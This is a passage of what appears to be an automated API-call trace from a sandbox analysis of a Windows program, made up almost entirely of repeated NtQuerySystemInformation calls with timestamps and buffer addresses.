_String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x50, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x50, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x50, ResultLength=0x0) [0212.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x38, ResultLength=0x0) [0212.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0212.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd830, Length=0x28, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x38, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0212.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x28, ResultLength=0x0) [0212.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x38, ResultLength=0x0) [0212.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x20, ResultLength=0x0) [0212.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x38, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x20, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0212.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.996] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a67fdac0 | out: lpSystemTimeAsFileTime=0xf7a67fdac0*(dwLowDateTime=0x11520546, dwHighDateTime=0x1d63874)) [0212.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb78, Length=0x50, ResultLength=0x0) [0212.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x28, ResultLength=0x0) [0212.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c8, Length=0x50, ResultLength=0x0) [0212.997] GetTickCount () returned 0x1175bfd [0212.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd898, Length=0x58, ResultLength=0x0) [0212.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0212.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0212.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5e0, Length=0x28, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd650, Length=0x28, ResultLength=0x0) [0213.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0213.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0213.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0213.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0213.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x20, ResultLength=0x0) [0213.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x38, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x20, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0213.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd898, Length=0x58, ResultLength=0x0) [0213.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0213.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0213.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0213.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0213.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x28, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0213.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0213.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0213.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0213.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0213.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x20, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x20, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0213.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0213.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0213.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0213.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0213.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd898, Length=0x58, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x58, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x28, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x28, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0213.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0213.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0213.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd680, Length=0x38, ResultLength=0x0) [0213.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd500, Length=0x20, ResultLength=0x0) [0213.521] 